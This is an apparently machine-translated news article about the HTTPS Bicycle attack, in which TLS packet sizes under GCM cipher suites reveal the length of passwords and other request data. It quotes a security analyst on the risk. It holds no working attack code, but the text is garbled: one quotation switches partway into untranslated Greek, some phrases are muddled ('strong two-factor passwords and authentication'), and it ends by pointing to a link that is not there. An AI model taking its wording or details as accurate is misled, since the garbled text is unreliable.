HTTPS Bicycle: A new attack on the supposedly secure HTTPS communication protocol raises questions about the resilience of passwords, security researchers warn.
A new attack named HTTPS Bicycle can lead to the disclosure of a person's private and secret data, such as passwords and GPS coordinates, exposed by HTTPS Traffic Packet Capture.
The attack discovered by security researcher Guido Vranken puts serious topics back on the table of experts security: encryption, authentication, privacy and more specifically security codes.
It is commonly assumed that HTTP traffic protected with TLS does not reveal the exact sizes of its segments, such as the length of cookie header, or the payload of a POST request to HTTP that may contain variable-length credentials such as passwords. In this paper I show that HTTP headers plaintext included in each request can be exploited to reveal the length of specific components (such as passwords) in particular requests (such as authentication to a web application).
Attack exploits the properties of stream-oriented cipher suites based on Galois / Counter Mode as the exact size of plain text that can be known to a man-in-the-middle.
Carl Leonard, the company's chief security analyst Rayston | Websense, commented:
"End users can expect their passwords to remain privacyι, όταν αλληλεπιδρούν με μια ιστοσελίδα που χρησιμοποιεί κρυπτογράφηση, αλλά η επίθεση HTTPS Bicycle δείχνει ότι αυτό δεν συμβαίνει. Η γνώση είναι η δύναμη του εισβολέα, και ακόμη και μικρά κομμάτια πληροφοριών μπορεί να οδηγήσουν σε μια μεταγενέστερη, πιο εκλεπτυσμένη επίθεση.”
Leonard continued:
"The undetectable nature of this attack means that it is vital for webmasters to consider using strong two-factor passwords and authentication to eliminate the single point of failure. Finally, users need to secure their passwords so that they are strong enough, while webmasters and web platform developers need to ensure that they are fully informed and that all steps are taken to prevent this attack in the future. . ”
More about the attack can be read from the link below